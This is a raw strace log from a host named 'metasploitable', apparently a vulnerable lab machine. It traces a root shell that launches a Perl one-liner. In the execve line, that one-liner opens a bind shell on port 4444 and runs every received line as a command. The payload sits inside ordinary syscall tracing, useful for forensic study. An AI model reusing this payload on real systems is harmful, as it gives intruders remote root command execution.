12703 07:43:43.488858 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

12703 07:43:43.488873 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12703 07:43:43.489345 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

12703 07:43:43.489399 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc7000

12703 07:43:43.489430 mmap2(0xb7dd0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dd0000

12703 07:43:43.489459 close(1)          = 0

12703 07:43:43.489490 munmap(0xb7f82000, 29913) = 0

12703 07:43:43.489506 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

12703 07:43:43.489521 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

12703 07:43:43.489532 _llseek(1, 0, [0], SEEK_CUR) = 0

12703 07:43:43.489544 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

12703 07:43:43.489560 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f89000

12703 07:43:43.489571 _llseek(1, 1624, [1624], SEEK_SET) = 0

12703 07:43:43.489585 munmap(0xb7f89000, 1624) = 0

12703 07:43:43.489595 close(1)          = 0

12703 07:43:43.489624 getpgrp()         = 3831

12703 07:43:43.489634 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

12703 07:43:43.489649 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

12703 07:43:43.489665 brk(0x8101000)    = 0x8101000

12703 07:43:43.489697 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12703 07:43:43.489712 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12703 07:43:43.489726 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12703 07:43:43.489764 brk(0x8102000)    = 0x8102000

12703 07:43:43.489790 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12703 07:43:43.489809 stat64("/sbin/AB", 0xbfadf938) = -1 ENOENT (No such file or directory)

12703 07:43:43.489835 stat64("/bin/AB", 0xbfadf938) = -1 ENOENT (No such file or directory)

12703 07:43:43.489874 stat64("/usr/sbin/AB", 0xbfadf938) = -1 ENOENT (No such file or directory)

12703 07:43:43.489900 stat64("/usr/bin/AB", 0xbfadf938) = -1 ENOENT (No such file or directory)

12703 07:43:43.489918 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12703 07:43:43.489934 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dfd6f8) = 12704

12704 07:43:43.489993 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12704 07:43:43.490009 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12704 07:43:43.490022 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12704 07:43:43.490034 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12704 07:43:43.490050 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12704 07:43:43.490065 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12704 07:43:43.490079 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12704 07:43:43.490133 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

12704 07:43:43.490147 --- SIGPIPE (Broken pipe) @ 0 (0) ---

12704 07:43:43.490213 exit_group(127)   = ?

12703 07:43:43.509474 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:43:43.509503 waitpid(12703,  <unfinished ...>

12703 07:43:43.509544 <... rt_sigprocmask resumed> NULL, 8) = 0

12703 07:43:43.509552 --- SIGCHLD (Child exited) @ 0 (0) ---

12703 07:43:43.509566 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12704

12703 07:43:43.509584 waitpid(-1, 0xbfadf5b8, WNOHANG) = -1 ECHILD (No child processes)

12703 07:43:43.509595 sigreturn()       = ? (mask now [])

12703 07:43:43.509618 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12703 07:43:43.509633 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12703 07:43:43.509644 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12703 07:43:43.509656 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

12703 07:43:43.509675 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12703 07:43:43.509686 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

12703 07:43:43.509723 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12703 07:43:43.509743 stat64("/sbin/perl", 0xbfadf968) = -1 ENOENT (No such file or directory)

12703 07:43:43.509756 stat64("/bin/perl", 0xbfadf968) = -1 ENOENT (No such file or directory)

12703 07:43:43.509768 stat64("/usr/sbin/perl", 0xbfadf968) = -1 ENOENT (No such file or directory)

12703 07:43:43.509780 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12703 07:43:43.509798 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12703 07:43:43.509824 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12703 07:43:43.509838 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dfd6f8) = 12705

12705 07:43:43.509890 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12705 07:43:43.509916 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12705 07:43:43.509930 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12705 07:43:43.509942 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12705 07:43:43.509957 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12705 07:43:43.509973 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12705 07:43:43.509986 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12705 07:43:43.510020 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

12705 07:43:43.510121 brk(0)            = 0x8153000

12705 07:43:43.510141 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12705 07:43:43.510157 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fbb000

12705 07:43:43.510173 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12705 07:43:43.510189 open("/etc/ld.so.cache", O_RDONLY) = 1

12705 07:43:43.510202 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12705 07:43:43.510219 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fb3000

12705 07:43:43.510230 close(1)          = 0

12705 07:43:43.510246 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12705 07:43:43.510262 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12705 07:43:43.510276 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12705 07:43:43.510369 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12705 07:43:43.510386 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7faf000

12705 07:43:43.510406 mmap2(0xb7fb1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fb1000

12705 07:43:43.510426 close(1)          = 0

12705 07:43:43.510437 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12705 07:43:43.510451 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

12705 07:43:43.510466 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

12705 07:43:43.510554 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

12705 07:43:43.510571 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f8a000

12705 07:43:43.510583 mmap2(0xb7fad000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fad000

12705 07:43:43.510598 close(1)          = 0

12705 07:43:43.510610 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12705 07:43:43.510624 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

12705 07:43:43.510638 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

12705 07:43:43.510728 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

12705 07:43:43.510745 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f89000

12705 07:43:43.510758 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f71000

12705 07:43:43.510768 mmap2(0xb7f85000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f85000

12705 07:43:43.510782 mmap2(0xb7f87000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f87000

12705 07:43:43.510796 close(1)          = 0

12705 07:43:43.510808 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12705 07:43:43.510821 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12705 07:43:43.510835 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12705 07:43:43.510932 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12705 07:43:43.510950 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e22000

12705 07:43:43.510961 mmap2(0xb7f6b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f6b000

12705 07:43:43.510976 mmap2(0xb7f6e000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f6e000

12705 07:43:43.510989 close(1)          = 0

12705 07:43:43.511001 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12705 07:43:43.511014 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

12705 07:43:43.511029 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

12705 07:43:43.511121 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

12705 07:43:43.511138 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df0000

12705 07:43:43.511149 mmap2(0xb7df9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7df9000

12705 07:43:43.511163 mmap2(0xb7dfb000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dfb000

12705 07:43:43.511177 close(1)          = 0

12705 07:43:43.511200 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7def000

12705 07:43:43.511213 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7def8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12705 07:43:43.511273 mprotect(0xb7f6b000, 4096, PROT_READ) = 0

12705 07:43:43.511299 munmap(0xb7fb3000, 29913) = 0

12705 07:43:43.511312 set_tid_address(0xb7def908) = 12705

12705 07:43:43.511321 set_robust_list(0xb7def910, 0xc) = 0

12705 07:43:43.511330 futex(0xbfb44fe0, 0x81 /* FUTEX_??? */, 1) = 0

12705 07:43:43.511347 rt_sigaction(SIGRTMIN, {0xb7f752c0, [], SA_SIGINFO}, NULL, 8) = 0

12705 07:43:43.511360 rt_sigaction(SIGRT_1, {0xb7f75340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

12705 07:43:43.511373 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

12705 07:43:43.511386 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

12705 07:43:43.511417 uname({sys="Linux", node="metasploitable", ...}) = 0

12705 07:43:43.511464 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

12705 07:43:43.511509 brk(0)            = 0x8153000

12705 07:43:43.511519 brk(0x8174000)    = 0x8174000

12705 07:43:43.511560 getuid32()        = 0

12705 07:43:43.511570 geteuid32()       = 0

12705 07:43:43.511579 getgid32()        = 0

12705 07:43:43.511588 getegid32()       = 0

12705 07:43:43.511625 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dce000

12705 07:43:43.511650 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

12705 07:43:43.511667 read(1, "\371Y3\10", 4) = 4

12705 07:43:43.511681 close(1)          = 0

12705 07:43:43.511699 time(NULL)        = 1495626223

12705 07:43:43.511740 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfb44cb0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511757 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfb44cb0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511770 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfb44cb0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511785 stat64("/usr/local/lib/perl/5.8.7", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511798 stat64("/usr/local/share/perl/5.8.7", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511810 stat64("/usr/local/lib/perl/5.8.6", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511821 stat64("/usr/local/share/perl/5.8.6", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511833 stat64("/usr/local/lib/perl/5.8.4", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511845 stat64("/usr/local/share/perl/5.8.4", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511856 stat64("/usr/local/lib/perl/5.8.3", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511868 stat64("/usr/local/share/perl/5.8.3", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511879 stat64("/usr/local/lib/perl/5.8.2", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511891 stat64("/usr/local/share/perl/5.8.2", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511891 stat64("/usr/local/lib/perl/5.8.1", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511891 stat64("/usr/local/share/perl/5.8.1", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511891 stat64("/usr/local/lib/perl/5.8.0", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511892 stat64("/usr/local/share/perl/5.8.0", 0xbfb44df0) = -1 ENOENT (No such file or directory)

12705 07:43:43.511892 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb44ae8) = -1 ENOTTY (Inappropriate ioctl for device)

12705 07:43:43.511892 _llseek(0, 0, [0], SEEK_CUR) = 0

12705 07:43:43.511892 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb44ae8) = -1 EBADF (Bad file descriptor)

12705 07:43:43.511893 _llseek(1, 0, 0xbfb44b30, SEEK_CUR) = -1 EBADF (Bad file descriptor)

12705 07:43:43.511893 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb44ae8) = -1 EINVAL (Invalid argument)

12705 07:43:43.511893 _llseek(2, 0, 0xbfb44b30, SEEK_CUR) = -1 ESPIPE (Illegal seek)

12705 07:43:43.511893 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

12705 07:43:43.511902 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfb44ba8) = -1 ENOTTY (Inappropriate ioctl for device)

